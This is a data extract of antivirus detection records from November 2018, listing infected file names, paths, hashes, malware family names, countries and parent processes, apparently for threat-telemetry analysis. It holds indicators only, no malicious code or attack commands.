  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Docume~1\\\\\\\\AllUse~1\\\\\\\\Templates\\\\\\\\1.vbs\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-02T10:05:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='opp.dll', filepath='C:\\Program Files\\Adobe\\Photoshop 7.0\\OPP.dll', filesize=324000, name='W32/Ramnit.C.#M0.#R0'), hash='0bb16306af5bbf20eb70837f37f1dd784dd4fee20be7729c81ffdf9289cb7f0d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T02:45:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0bb1c7bdd19aec67347e68ecdca510472e8eb621ca77116220fcc9cbd7bc7eb4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BB1C7BDD19AEC67347E68ECDCA510472E8EB621CA77116220FCC9CBD7BC7EB4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0bb1c7bdd19aec67347e68ecdca510472e8eb621ca77116220fcc9cbd7bc7eb4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:43:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0bb1c7bdd19aec67347e68ecdca510472e8eb621ca77116220fcc9cbd7bc7eb4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BB1C7BDD19AEC67347E68ECDCA510472E8EB621CA77116220FCC9CBD7BC7EB4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0bb1c7bdd19aec67347e68ecdca510472e8eb621ca77116220fcc9cbd7bc7eb4', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:11:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0bb1c7bdd19aec67347e68ecdca510472e8eb621ca77116220fcc9cbd7bc7eb4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BB1C7BDD19AEC67347E68ECDCA510472E8EB621CA77116220FCC9CBD7BC7EB4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0bb1c7bdd19aec67347e68ecdca510472e8eb621ca77116220fcc9cbd7bc7eb4', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:17:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0c4dde5ee9a149ae874fb8a12e2a55a20045a0f7ae7bb323d67fdbc180d5aa5d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0C4DDE5EE9A149AE874FB8A12E2A55A20045A0F7AE7BB323D67FDBC180D5AA5D', filesize=1580000, name='HEUR/AGEN.1035178.#M1.#R1'), hash='0c4dde5ee9a149ae874fb8a12e2a55a20045a0f7ae7bb323d67fdbc180d5aa5d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:52:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0c4dde5ee9a149ae874fb8a12e2a55a20045a0f7ae7bb323d67fdbc180d5aa5d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0C4DDE5EE9A149AE874FB8A12E2A55A20045A0F7AE7BB323D67FDBC180D5AA5D', filesize=1580000, name='HEUR/AGEN.1035178.#M1.#R1'), hash='0c4dde5ee9a149ae874fb8a12e2a55a20045a0f7ae7bb323d67fdbc180d5aa5d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:24:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0c4dde5ee9a149ae874fb8a12e2a55a20045a0f7ae7bb323d67fdbc180d5aa5d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0C4DDE5EE9A149AE874FB8A12E2A55A20045A0F7AE7BB323D67FDBC180D5AA5D', filesize=1580000, name='HEUR/AGEN.1035178.#M1.#R1'), hash='0c4dde5ee9a149ae874fb8a12e2a55a20045a0f7ae7bb323d67fdbc180d5aa5d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:26:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fb4_03.htm', filepath='C:\\orant\\TOOLS\\DOC60\\us\\D2k\\Fb\\fb4_03.htm', filesize=196000, name='HTML/Drop.VBS.A.#M1.#R1'), hash='0c7fa4ad513908b937feb30baa9a71ea7322b26acb5bb2642fa83a1ce2d894af', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T06:08:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110744-316ab188', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_25d516d9\\AVSCAN-20181102-110715-2C520CC1\\AVSCAN-20181102-110744-316AB188', filesize=196000, name='HTML/Drop.VBS.A.#M1.#R1'), hash='0c7fa4ad513908b937feb30baa9a71ea7322b26acb5bb2642fa83a1ce2d894af', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trustedinstaller.exe', filepath='C:\\Temp\\TrustedInstaller.exe', filesize=192000, name='BDS/Androm.EB.73.#M1.#R1'), hash='0cd834eaeccc8ef4ac62b7b9a14d7a0270bfbecc774c8387cdf720bcaa3f32fa', metadata=Row(cmdline='\\\\\\/increment', country='TR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\aitagent.exe', parentsize=None, timestamp='2018-11-02T05:11:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-071234-c8e62dbb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1aa4042c\\AVSCAN-20181102-071218-C74276CA\\AVSCAN-20181102-071234-C8E62DBB', filesize=192000, name='BDS/Androm.EB.73.#M1.#R1'), hash='0cd834eaeccc8ef4ac62b7b9a14d7a0270bfbecc774c8387cdf720bcaa3f32fa', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cat.exe', filepath='C:\\Users\\X\\Documents\\National Instruments\\Circuit Design Suite 12.0\\codemodl\\USER\\CAT.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='0d0649f7dfc5dd8d852dc8a00b5509ac9c3e9745261a2930cd73d13e80072b53', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe2_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T06:20:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cat.exe', filepath='C:\\Users\\X\\Documents\\National Instruments\\Circuit Design Suite 12.0\\codemodl\\USER\\CAT.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='0d0649f7dfc5dd8d852dc8a00b5509ac9c3e9745261a2930cd73d13e80072b53', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T09:09:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0d70c1750382fb0ba03b7d6912c1a3c425c0aafb7a2cc66464a27100ef6a1c4c', filepath='C:\\Users\\X\\Downloads\\t\\ D_\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-25\\0D70C1750382FB0BA03B7D6912C1A3C425C0AAFB7A2CC66464A27100EF6A1C4C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0d70c1750382fb0ba03b7d6912c1a3c425c0aafb7a2cc66464a27100ef6a1c4c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T06:35:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0d70c1750382fb0ba03b7d6912c1a3c425c0aafb7a2cc66464a27100ef6a1c4c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-25\\0D70C1750382FB0BA03B7D6912C1A3C425C0AAFB7A2CC66464A27100EF6A1C4C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0d70c1750382fb0ba03b7d6912c1a3c425c0aafb7a2cc66464a27100ef6a1c4c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:01:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0daa06240e33f2a887308725eb0e802e8524f8f970270dfc7c6f2a981fe638a6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0DAA06240E33F2A887308725EB0E802E8524F8F970270DFC7C6F2A981FE638A6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0daa06240e33f2a887308725eb0e802e8524f8f970270dfc7c6f2a981fe638a6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:43:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0daa06240e33f2a887308725eb0e802e8524f8f970270dfc7c6f2a981fe638a6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0DAA06240E33F2A887308725EB0E802E8524F8F970270DFC7C6F2A981FE638A6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0daa06240e33f2a887308725eb0e802e8524f8f970270dfc7c6f2a981fe638a6', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:11:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0daa06240e33f2a887308725eb0e802e8524f8f970270dfc7c6f2a981fe638a6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0DAA06240E33F2A887308725EB0E802E8524F8F970270DFC7C6F2A981FE638A6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0daa06240e33f2a887308725eb0e802e8524f8f970270dfc7c6f2a981fe638a6', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:18:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='langpack.exe.pptx', filepath='E:\\AutoCAD 2006\\Auto CAD 2006\\Bin\\acadFeui\\support\\dotnetfx\\ita\\langpack.exe.PPTX', filesize=1496000, name='W32/Xorer.DR.#M1.#R1'), hash='0e6997e7a00eaeb5b54f885d76feaf4eceb195d5a0434d5855cc79f8c977b3f9', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Spyware Terminator\\SpywareTerminator.exe', parentsize=7014656, timestamp='2018-11-02T03:03:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='csproj.dll', filepath='C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VC#\\VCSPackages\\csproj.dll', filesize=1984000, name='W32/Ramnit.CD.#M1.#R1'), hash='0e6ee395a2a9ee46eccfddff00e83536bb187d60776d63cffc76c7702e18c466', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T21:01:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='chickeninvaders2xmasdemo.exe', filepath='j:\\العاب\\games  000\\العاب جديده\\chickeninvaders 3\\ChickenInvaders2Xmasdemo.exe', filesize=640000, name='W32/Neshta.A.#M1.#R1'), hash='0ef29dbd50fea0bf6885abdf69f78748b9ac31cabb276e6f8e6e67f89de598ec', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:32:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adorage.dll', filepath='C:\\Program Files\\CyberLink\\Shared files\\Plugin\\proDAD\\adorage.dll', filesize=1920000, name='W32/Ramnit.CD.#M1.#R1'), hash='0f1aadc40295db58302849cfe1f06bbee568c045c4997fa7ac177fd19f928106', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CyberLink\\PowerDirector13\\PDR13.exe', parentsize=3479304, timestamp='2018-11-02T04:09:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adorage.dll', filepath='C:\\Program Files\\CyberLink\\Shared files\\Plugin\\proDAD\\adorage.dll', filesize=1920000, name='W32/Ramnit.CD.#M1.#R1'), hash='0f1aadc40295db58302849cfe1f06bbee568c045c4997fa7ac177fd19f928106', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T02:38:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avr-c++.exe', filepath='C:\\Program Files\\arduino-nightly-windows\\arduino-nightly\\hardware\\tools\\avr\\bin\\avr-c++.exe', filesize=832000, name='W32/Sality.AT.#M1.#R1'), hash='0faaff548338c98a2259dd3f448a1d1e7aac1ee6b23920aab264af493931a4a8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:2\\\\\\/I7YfiU30u12FoH.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=37096, timestamp='2018-11-02T09:57:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='104e863b75ef04fabbb64e1d7c8e99194c968a744fe42b618b723c52786730b7', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pfsmerge.exe', filepath='C:\\Program Files\\DHI\\2009\\bin\\pfsmerge.exe', filesize=384000, name='DR/Delphi.Gen.#M300.#R3883'), hash='106350d96b0849401dbd3c2c0635f2da90fe30d9a37e2ace90d9b919db5a3fc8', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:10:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pfsmerge.exe', filepath='C:\\Program Files\\DHI\\2009\\bin\\pfsmerge.exe', filesize=384000, name='DR/Delphi.Gen.#M300.#R3883'), hash='106350d96b0849401dbd3c2c0635f2da90fe30d9a37e2ace90d9b919db5a3fc8', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:50:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1645062b724c29a0914bda3bcd3cc4491b5e9b20', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\1645062b724c29a0914bda3bcd3cc4491b5e9b20', filesize=384000, name='HEUR/AGEN.1029348.#M1.#R1'), hash='1068de664d5b83e7490f5a8ea69de8cd30a192b4af0ba9fc1d261f571e8b92cb', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:20:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0214382.exe', filepath='H:\\System Volume Information\\_restore{1A756976-7FD6-45DE-97F9-50E788C09282}\\RP878\\A0214382.exe', filesize=9644000, name='W32/Parite.#M1.#R1'), hash='10818c2682104d33af3922322b9ca88578cc2cc091d738ca0bf8eaf5b5ae5411', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:22:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e4ef8ecb5e7ca94dadde2c0a14da7c8d7ea445e7', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\e4ef8ecb5e7ca94dadde2c0a14da7c8d7ea445e7', filesize=384000, name='Adware/DealPly.113c30.#M1.#R1'), hash='113c3076f8a6a1aedfa7ec4d95702ec63dbffe9dcb93dc85bef08c9b15783a48', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:52:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='118242fcdbe10a1485d5ee33f315c7667607ee92d95468e637c38b27529b6fcd', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bfb82410', filepath='C:\\Users\\X\\Desktop\\BFB82410', filesize=128000, name='X2000M/Agent.6489234.#M1.#R1'), hash='119f96ae1a8598d250986a9b2fdd7618d1b9dbd26628185f69fac0ae59ced889', metadata=Row(cmdline='\\\\\\/dde', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Office\\Office15\\EXCEL.EXE', parentsize=32902304, timestamp='2018-11-02T06:26:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bfb82410', filepath='C:\\Users\\X\\Desktop\\BFB82410', filesize=128000, name='X2000M/Agent.6489234.#M1.#R1'), hash='119f96ae1a8598d250986a9b2fdd7618d1b9dbd26628185f69fac0ae59ced889', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T06:26:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bfb82410', filepath='C:\\Users\\X\\Desktop\\BFB82410', filesize=128000, name='X2000M/Agent.6489234.#M1.#R1'), hash='119f96ae1a8598d250986a9b2fdd7618d1b9dbd26628185f69fac0ae59ced889', metadata=Row(cmdline='\\\\\\/dde', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Office\\Office15\\EXCEL.EXE', parentsize=32902304, timestamp='2018-11-02T06:27:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='capafe.exe', filepath='\\\\?\\D:\\programs\\canon 810\\English\\WIN9X\\CAPAFE.EXE', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='11c4ac9fa64798ac1b1443e5459a7111d68ea23e7906bc08601b3e98868e5e76', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:03:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gpestn 2013.exe', filepath='g:\\pro evolution soccer 2013 caf 4\\kitserver13\\data\\switches\\versions\\1.04\\gPESTN 2013.exe', filesize=20032000, name='W32/Ramnit.CD.#M1.#R1'), hash='11dc5e691fa1b79305f7734155dc84584a6ed6142c048ebd33b3f97fc6be8386', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:43:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-095407-8fb1d253', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_793444eb\\AVSCAN-20181102-093900-8B975244\\AVSCAN-20181102-095407-8FB1D253', filesize=20000, name='APPL/Linkury.Gen2.#M1.#R1'), hash='12400c625de5c6d1b2da77aa9bd992b2ab281639ccd3b30fee228558f86a89a4', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:54:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-095642-1336395f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_793444eb\\AVSCAN-20181102-093900-8B975244\\AVSCAN-20181102-095642-1336395F', filesize=20000, name='APPL/Linkury.Gen2.#M1.#R1'), hash='12400c625de5c6d1b2da77aa9bd992b2ab281639ccd3b30fee228558f86a89a4', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:56:44Z'), dt=datetime.date(2018, 11, 2)),
